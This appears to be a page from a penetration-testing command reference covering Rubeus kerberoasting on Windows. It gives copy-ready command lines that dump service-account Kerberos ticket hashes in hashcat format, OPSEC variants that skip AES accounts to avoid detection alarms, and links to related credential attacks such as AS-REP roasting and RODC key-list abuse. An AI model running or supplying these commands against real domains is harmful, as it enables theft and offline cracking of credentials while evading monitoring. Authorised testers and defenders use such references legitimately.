Rubeus kerberoast
Roast every kerberoastable account in the domain from a Windows host. Auto-discovers SPNs via LDAP and dumps hashcat-13100 hashes. /usetgtdeleg avoids requesting tickets with your own creds; /rc4opsec skips AES-only accounts (no downgrade alarm).
- Tool
- Rubeus.exe
- Category
- Credential Attacks / Kerberoasting
- Platform
- windows
- Requires
- shell access
- Protocols
- KERBEROS, LDAP
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
Rubeus.exe kerberoast /outfile:hashes.txt
Credential variants
The same attack using a different authentication material.
Specific User requires shell access
Rubeus.exe kerberoast /user:<target-user> /outfile:hashes.txt
OPSEC (RC4 only) requires shell access
Rubeus.exe kerberoast /rc4opsec /usetgtdeleg /outfile:hashes.txt
Console Output requires shell access
Rubeus.exe kerberoast /simple /nowrap
Examples
Rubeus.exe kerberoast /outfile:hashes.txt
Tags
References
Related commands
- Impacket AS-REP Roast AS-REP Roasting for accounts without Kerberos Pre-Authentication
- Impacket Get TGT Get TGT to be used in Kerberos authentication
- Impacket Kerberoast Extract service account hashes via Kerberoasting
- Impacket KeyListAttack Abuse RODC (Read-Only DC) credential caching to retrieve hashes for accounts cached on…
- Impacket Targeted Kerberoast Request a TGS only for a specific service account instead of every kerberoastable user…
- NetExec LDAP AS-REP Roasting Request AS-REP responses for every account with DONT_REQ_PREAUTH set and write hashes to…
- NetExec LDAP Kerberoasting Request TGS tickets for every account with a SPN and write hashes to a file ready for…
- NetExec LDAP Pre-Windows 2000 Accounts Enumerate pre-Windows 2000 compatible computer accounts that use the hostname as password